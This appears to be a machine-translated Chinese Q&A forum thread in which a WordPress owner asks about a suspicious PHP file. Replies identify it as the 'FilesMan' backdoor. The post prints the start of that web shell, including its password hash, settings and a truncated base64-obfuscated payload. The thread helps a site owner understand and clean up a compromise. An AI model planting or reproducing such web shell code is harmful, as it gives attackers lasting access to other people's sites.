2014-09-23 146 views
0

今天我检查了我的wordpress网站,我观察到一个PHP文件曾在它下面的代码:奇怪的代码

根据THIS它是一个编码(eval64))黑客。下面代码的含义是什么? 这与基本编码eval64黑客相同吗?

<? 
$auth_pass = "2fba9596aec8aeb14a88461bbd708f97"; 
$color = "#df5"; 
$default_action = 'FilesMan'; 
$default_use_ajax = true; 
$default_charset = 'Windows-1251'; 
$xYEzDu6r3EZT="GR5yYXp3YH17ejRne3h9cGdgdWBxPDB5dX9xYWQ9NG8ZHjQ0NDQweHt4NCk0MzMvGR40NDQ0cntmPDB9KSQvMH00KDRnYGZ4cXo8MHl1f3FhZD0vMH0/KSY9NG8ZHjQ0NDQ0NDB4e3g6KXd8Zjx8cWxwcXc8Z2F2Z2BmPDB5dX9xYWQ4MH04Jj09PS8ZHjQ0NDRpGR40NDQ0ZnFgYWZ6NDB4e3gvGR5pGR4wZ3F9d3t4fXp/KWd7eH1wZ2B1YHE8MyYgIyciciMhIyYiJyIhJ3AiJiIlIyciISciJyAhciIgIiEiJyJyIiAiISYsIXUhLCF1IiwiJiAnIiwicSIhInAidyMhIXUicCMsIiwiICAjISEiciEtInAgIiN1IXUhICEtJyQhLCcmISYidyEtJyYnLSJ2IXUhJyIjInEgcSEjIC0jLCByISMhdScgIichICBwIyMiJSJ2ISUnICF1ICcnLScnIicgICEiICAgcCcnISYhJiImJyQnJScgIHEgISBxISYiJiJxIiwhdSEjISAhJiJ1IXUhLCMkICIhdSEjIHUgIyEiICwhdSchISEicSAlJyQiICAsIiMjIyF1JyUgIiEsIHAidyIsIyciJSEgIXUnJSBxISMidickIichIyAtIyIgcSclICYhISEgInUhdSEsISInJiMsInAhICEhISEnJSBxJycgdSclIiAgJyMgInAiJSMtJy0hJCEtISMgcSB2IScnJicsJyEhJiJ2IncgLCImI3UgIiAsIiYjdSJ3IC0hJyEhIicnJSEtInciIyN1IS0nJiMgI3UiICJwInYnJiE...... 
+1

似乎像来自Rusian黑客的攻击。在一个月前,我发现我的一个客户在9个wordpress网站注入了这些代码。您的代码似乎未完成。 – 2014-09-23 11:26:29

+0

应该有办法在服务器中注入这些代码,找到注入的文件并将其删除。 – 2014-09-23 11:27:51

+0

取整行'$ xYEzDu6r3EZT =“...”'并使用base64解码器在线解码。 – DanFromGermany 2014-09-23 11:27:53

回答

1

上面的代码是一个非常常见的名为“FilesMan”的后门脚本。典型的后门脚本是用php编写的。黑客在他们已经入侵的网站上放置“baskdoor”是很常见的。即使网站所有者更改了帐户密码,后门程序也可以让黑客继续访问该网站。后门脚本将从100行代码到1或2行代码。

欲了解详情请访问网站http://aw-snap.info/articles/backdoor-examples.php